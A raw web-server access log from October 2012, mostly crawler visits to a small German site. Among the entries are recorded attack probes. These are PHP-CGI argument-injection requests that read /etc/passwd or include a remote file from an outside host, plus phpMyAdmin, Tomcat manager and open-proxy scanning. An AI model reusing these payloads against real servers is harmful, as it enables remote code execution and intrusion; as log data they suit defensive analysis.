64.246.161.42 - - [22/Oct/2012:06:40:04 +0200] "GET /leer.htm HTTP/1.1" 404 313 "http://whois.domaintools.com/dialyse-schoenebeck.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
85.178.101.165 - - [22/Oct/2012:07:04:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [22/Oct/2012:07:26:40 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [22/Oct/2012:07:26:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
194.153.113.35 - - [22/Oct/2012:08:41:42 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
173.242.124.160 - - [22/Oct/2012:11:08:40 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.242.124.160 - - [22/Oct/2012:11:08:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
64.246.161.30 - - [22/Oct/2012:11:25:44 +0200] "GET /frameset/left.htm HTTP/1.1" 404 322 "http://whois.domaintools.com/die-sehnsucht.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.161.30 - - [22/Oct/2012:11:25:44 +0200] "GET /frameset/top.htm HTTP/1.1" 404 321 "http://whois.domaintools.com/die-sehnsucht.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.161.30 - - [22/Oct/2012:11:25:44 +0200] "GET /neue_seite_1.htm HTTP/1.1" 404 321 "http://whois.domaintools.com/die-sehnsucht.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
178.154.179.250 - - [22/Oct/2012:11:32:30 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
80.134.197.55 - - [22/Oct/2012:11:43:08 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1"
178.154.179.250 - - [22/Oct/2012:14:15:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [22/Oct/2012:15:08:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.197.254.3 - - [22/Oct/2012:16:43:07 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bing.com/search?q=mink+oil&src=IE-SearchBox&FORM=IE8SRC" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; MS-RTC LM 8; InfoPath.2)"
178.197.254.3 - - [22/Oct/2012:16:43:07 +0200] "GET /favicon.ico HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; MS-RTC LM 8; InfoPath.2)"
178.197.254.3 - - [22/Oct/2012:16:46:46 +0200] "GET / HTTP/1.1" 304 - "http://www.bing.com/search?q=mink+oil&src=IE-SearchBox&FORM=IE8SRC" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; MS-RTC LM 8; InfoPath.2)"
178.197.254.3 - - [22/Oct/2012:16:46:46 +0200] "GET /favicon.ico HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; MS-RTC LM 8; InfoPath.2)"
66.249.73.183 - - [22/Oct/2012:17:24:21 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.183 - - [22/Oct/2012:17:24:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.240.68.153 - - [22/Oct/2012:18:49:42 +0200] "GET http://images4.byinter.net/PL3303665.gif HTTP/1.1" 404 324 "-" "webcollage/1.135a"
199.30.59.172 - - [22/Oct/2012:18:53:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
199.30.59.172 - - [22/Oct/2012:18:53:44 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
94.102.51.246 - - [22/Oct/2012:20:24:13 +0200] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7ab745aa00143SSQJ_W_EFBF%5CE HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
66.249.73.183 - - [22/Oct/2012:21:14:08 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.9.249.29 - - [22/Oct/2012:21:55:34 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.249.29 - - [22/Oct/2012:21:55:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
65.55.24.221 - - [22/Oct/2012:22:50:24 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.221 - - [22/Oct/2012:22:53:09 +0200] "GET /seiten/datenschutz.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.52.95 - - [22/Oct/2012:23:15:40 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.52.95 - - [22/Oct/2012:23:17:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.77.126.55 - - [23/Oct/2012:06:58:29 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [23/Oct/2012:06:58:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.154.179.250 - - [23/Oct/2012:17:40:40 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.30.58.121 - - [23/Oct/2012:18:00:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
199.30.58.121 - - [23/Oct/2012:18:00:04 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
178.25.93.230 - - [23/Oct/2012:18:21:44 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [23/Oct/2012:18:21:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
94.102.51.246 - - [23/Oct/2012:19:20:23 +0200] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7ab745aa00143SSQJ_W_EFBF%5C%40 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
176.9.51.140 - - [23/Oct/2012:19:33:09 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.51.140 - - [23/Oct/2012:19:33:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
222.73.21.47 - - [23/Oct/2012:19:38:44 +0200] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
93.128.154.122 - - [23/Oct/2012:21:00:10 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
93.128.154.122 - - [23/Oct/2012:21:00:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
93.128.154.122 - - [23/Oct/2012:21:41:41 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
93.128.154.122 - - [23/Oct/2012:21:41:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
94.23.45.14 - - [23/Oct/2012:22:13:53 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
178.154.179.250 - - [23/Oct/2012:22:14:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
64.56.64.136 - - [23/Oct/2012:22:47:03 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
64.56.64.136 - - [23/Oct/2012:22:47:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [23/Oct/2012:22:47:59 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [23/Oct/2012:22:48:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
94.23.225.68 - - [23/Oct/2012:23:09:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
178.154.179.250 - - [24/Oct/2012:00:30:16 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
85.8.28.206 - - [24/Oct/2012:00:56:26 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
85.8.28.206 - - [24/Oct/2012:00:56:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
87.118.116.25 - - [24/Oct/2012:01:25:10 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; UnisterBot; crawler@unister.de)"
87.118.116.25 - - [24/Oct/2012:01:25:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; UnisterBot; crawler@unister.de)"
206.253.226.18 - - [24/Oct/2012:02:39:11 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
74.94.105.14 - - [24/Oct/2012:04:23:23 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
74.94.105.14 - - [24/Oct/2012:04:23:23 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
74.94.105.14 - - [24/Oct/2012:04:23:23 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
74.94.105.14 - - [24/Oct/2012:04:23:23 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
74.94.105.14 - - [24/Oct/2012:04:23:23 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
74.94.105.14 - - [24/Oct/2012:04:23:23 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
74.94.105.14 - - [24/Oct/2012:04:23:23 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
74.94.105.14 - - [24/Oct/2012:04:23:23 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
74.94.105.14 - - [24/Oct/2012:04:23:23 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
74.94.105.14 - - [24/Oct/2012:04:23:23 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.154.179.250 - - [24/Oct/2012:04:28:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [24/Oct/2012:05:17:21 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [24/Oct/2012:06:14:17 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
93.92.217.228 - - [24/Oct/2012:07:55:07 +0200] "GET / HTTP/1.1" 400 329 "-" "Opera/9.771 (Windows NT 6.0; U; nl) Presto/461.871.71 Version/71.391"
91.226.212.41 - - [24/Oct/2012:08:47:46 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [24/Oct/2012:09:25:51 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
65.52.108.178 - - [24/Oct/2012:09:33:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
66.249.73.150 - - [24/Oct/2012:09:56:34 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.150 - - [24/Oct/2012:09:56:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
91.226.212.41 - - [24/Oct/2012:10:02:04 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [24/Oct/2012:10:23:29 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [24/Oct/2012:10:54:19 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
195.37.205.12 - - [24/Oct/2012:11:16:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0"
195.37.205.12 - - [24/Oct/2012:11:16:21 +0200] "GET /favicon.ico HTTP/1.0" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0"
178.154.179.250 - - [24/Oct/2012:11:17:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
91.226.212.41 - - [24/Oct/2012:11:26:05 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
75.67.61.3 - - [24/Oct/2012:12:06:26 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
75.67.61.3 - - [24/Oct/2012:12:06:26 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
75.67.61.3 - - [24/Oct/2012:12:06:26 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
75.67.61.3 - - [24/Oct/2012:12:06:26 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
75.67.61.3 - - [24/Oct/2012:12:06:26 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
75.67.61.3 - - [24/Oct/2012:12:06:26 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
75.67.61.3 - - [24/Oct/2012:12:06:26 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
75.67.61.3 - - [24/Oct/2012:12:06:26 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
75.67.61.3 - - [24/Oct/2012:12:06:26 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
75.67.61.3 - - [24/Oct/2012:12:06:26 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
91.226.212.41 - - [24/Oct/2012:12:15:37 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
178.154.179.250 - - [24/Oct/2012:12:49:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
91.226.212.41 - - [24/Oct/2012:12:55:51 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [24/Oct/2012:13:23:10 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
66.249.73.140 - - [24/Oct/2012:13:31:35 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.140 - - [24/Oct/2012:13:31:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
91.226.212.41 - - [24/Oct/2012:14:04:24 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
145.253.99.90 - - [24/Oct/2012:14:16:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMDTDF; .NET4.0C; InfoPath.1)"
145.253.99.90 - - [24/Oct/2012:14:16:19 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMDTDF; .NET4.0C; InfoPath.1)"
145.253.99.90 - - [24/Oct/2012:14:17:09 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMDTDF; .NET4.0C; InfoPath.1)"
145.253.99.90 - - [24/Oct/2012:14:18:03 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMDTDF; .NET4.0C; InfoPath.1)"
91.65.28.16 - - [24/Oct/2012:14:22:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729)"
91.65.28.16 - - [24/Oct/2012:14:22:48 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729)"
145.253.99.90 - - [24/Oct/2012:14:23:04 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMDTDF; .NET4.0C; InfoPath.1)"
180.131.3.12 - - [24/Oct/2012:14:47:30 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
180.131.3.12 - - [24/Oct/2012:14:47:31 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
180.131.3.12 - - [24/Oct/2012:14:47:31 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
180.131.3.12 - - [24/Oct/2012:14:47:31 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
180.131.3.12 - - [24/Oct/2012:14:47:36 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
180.131.3.12 - - [24/Oct/2012:14:47:37 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
220.189.222.117 - - [24/Oct/2012:15:32:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.189.222.117 - - [24/Oct/2012:15:32:15 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
173.242.124.160 - - [24/Oct/2012:16:05:29 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.242.124.160 - - [24/Oct/2012:16:05:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
74.118.192.202 - - [24/Oct/2012:16:51:40 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
74.118.192.202 - - [24/Oct/2012:16:51:41 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.81.46 - - [24/Oct/2012:21:34:59 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
5.9.81.46 - - [24/Oct/2012:21:34:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
178.154.179.250 - - [25/Oct/2012:00:20:00 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [25/Oct/2012:01:04:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
184.154.42.194 - - [25/Oct/2012:01:26:01 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
206.253.226.18 - - [25/Oct/2012:02:36:59 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
157.55.33.182 - - [25/Oct/2012:02:51:23 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.33.182 - - [25/Oct/2012:03:28:22 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
74.52.245.146 - - [25/Oct/2012:06:35:58 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
218.201.121.99 - - [25/Oct/2012:09:40:15 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [25/Oct/2012:09:40:15 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [25/Oct/2012:09:40:15 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [25/Oct/2012:09:40:15 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [25/Oct/2012:09:40:15 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [25/Oct/2012:09:40:15 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [25/Oct/2012:09:40:15 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [25/Oct/2012:09:40:15 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [25/Oct/2012:09:40:15 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [25/Oct/2012:09:40:15 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
157.55.33.182 - - [25/Oct/2012:09:43:48 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.77.126.55 - - [25/Oct/2012:09:47:12 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [25/Oct/2012:09:47:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
65.246.128.36 - - [25/Oct/2012:09:55:48 +0200] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://rockingham911.org/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://rockingham911.org/api.gif%20-n HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
157.55.33.182 - - [25/Oct/2012:09:59:27 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
64.246.165.50 - - [25/Oct/2012:11:31:29 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.50 - - [25/Oct/2012:11:31:29 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/mink-berlin.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
194.153.113.35 - - [25/Oct/2012:12:33:11 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
220.189.222.117 - - [25/Oct/2012:14:54:29 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
